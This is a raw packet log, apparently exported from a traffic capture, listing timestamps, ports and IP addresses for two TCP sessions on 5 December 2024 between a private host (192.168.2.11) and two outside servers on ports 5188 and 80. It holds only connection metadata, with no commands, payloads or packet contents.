Dec 5, 2024 17:32:15.026386023 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.026793957 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.027015924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.027050018 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.027910948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.027952909 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.028395891 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.029089928 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.029314995 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.029364109 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.030257940 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.030627012 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.030708075 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.031352997 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.032429934 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.032563925 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.032588005 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.032628059 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.032628059 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.033595085 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.034765959 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.034778118 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.034815073 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.034818888 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.034905910 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.035847902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.036006927 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.036145926 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.037354946 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.038201094 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.038212061 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.038532019 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.039159060 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.039303064 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.039347887 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.039505005 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.039541006 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.040620089 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.041714907 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.041728020 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.041785955 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.041964054 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.042728901 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.042768002 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.043150902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.043845892 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.043884993 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.043979883 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.044472933 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.044969082 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.045072079 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.045120001 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.046135902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.046462059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.046617031 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.047245979 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.047991991 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.048392057 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.048435926 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.048499107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.049282074 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.049603939 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.049622059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.049707890 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.050707102 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.050884962 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.050939083 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.051779032 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.051848888 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.052938938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.052978039 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.053173065 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.053889036 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.054056883 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.054866076 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.054905891 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.055186987 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.055479050 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.055562019 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.056353092 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.056514978 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.057452917 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.057497025 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.057734966 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.058630943 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.058672905 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.059550047 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.059782982 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.059801102 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.059843063 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.059843063 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.060967922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.061172009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.061217070 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.061985970 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.102312088 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.113023996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.113086939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.113128901 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.113353968 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.113395929 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.113406897 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.113604069 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.113679886 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.113717079 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.113725901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.114528894 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.114566088 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.115375042 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.115415096 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.115694046 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.115711927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.115746975 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.116839886 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.116935968 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.116941929 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.116969109 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.118010998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.118078947 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.118215084 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.119126081 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.119466066 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.119503021 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.120268106 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.120304108 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.120475054 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.120507002 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.121450901 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.121485949 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.121680975 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.121716976 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.122590065 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.123065948 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.123101950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.123774052 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.123811960 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.123903990 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.123936892 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.124924898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.124963999 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.125034094 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.125072956 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.126096010 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.126229048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.126274109 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.127196074 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.127244949 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.127273083 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.127340078 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.128516912 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.128568888 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.128587008 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.128624916 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.129554987 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.129609108 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.129858971 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.129951954 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.130661964 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.130713940 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.130872965 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.131114006 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.131851912 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.131905079 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.131936073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.132153034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.133014917 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.133070946 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.133524895 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.134185076 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.134205103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.134221077 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.134347916 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.134387970 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.135327101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.135373116 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.135396004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.135435104 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.136459112 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.136507034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.136760950 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.136812925 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.137655020 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.137705088 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.137904882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.137948990 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.138771057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.138822079 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.139388084 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.139436960 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.139902115 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.139960051 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.140233040 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.140276909 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.141073942 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.141128063 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.141490936 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.141544104 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.142306089 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.142355919 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.142460108 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.142503977 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.143384933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.143445969 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.143557072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.143609047 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.144623041 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.144675970 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.144680977 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.144720078 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.145701885 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.145756006 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.145950079 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.146017075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.146833897 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.146887064 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.146987915 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.147130966 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.148224115 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.148272038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.148457050 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.148502111 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.149372101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.149420977 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.149732113 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.149777889 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.150321007 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.150366068 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.150367975 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.150405884 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.151492119 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.151539087 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.151623964 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.151664019 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.152677059 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.152729034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.153388023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.153440952 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.153822899 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.153836012 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.153876066 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.153888941 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.154936075 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.154993057 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.155049086 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.155088902 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.156097889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.156148911 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.156606913 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.156651020 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.157269955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.157316923 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.158260107 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.158308983 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.158384085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.158427000 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.158572912 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.158617020 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.159606934 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.159657001 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.159692049 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.159734011 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.160684109 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.160738945 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.160911083 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.160953999 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.161902905 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.161952972 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.161972046 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.162014008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.163002014 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.163023949 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.163048983 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.163064003 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.164208889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.164261103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.164979935 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.165025949 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.165324926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.165370941 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.165839911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.165885925 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.166502953 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.166549921 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.166620970 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.166665077 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.167781115 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.167829037 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.167859077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.167901993 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.175364971 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.175384045 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.175395966 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.175406933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.175419092 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.175431967 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.175446033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.175451994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.175458908 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.175488949 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.175513983 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.194739103 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.194808006 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.194910049 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.195252895 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.195667982 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.195729971 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.196397066 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.196767092 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.196890116 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.196918964 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.198003054 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.198092937 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.198133945 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.199038982 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.199095011 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.199177980 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.200203896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.200253010 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.201062918 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.201414108 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.201426983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.201473951 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.202510118 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.202560902 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.202771902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.203730106 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.203778028 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.203839064 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.205466986 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.205634117 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.205811024 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.206276894 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.206302881 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.206321001 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.207180977 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.207241058 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.207675934 CET	5188	49792	92.255.85.66	192.168.2.11
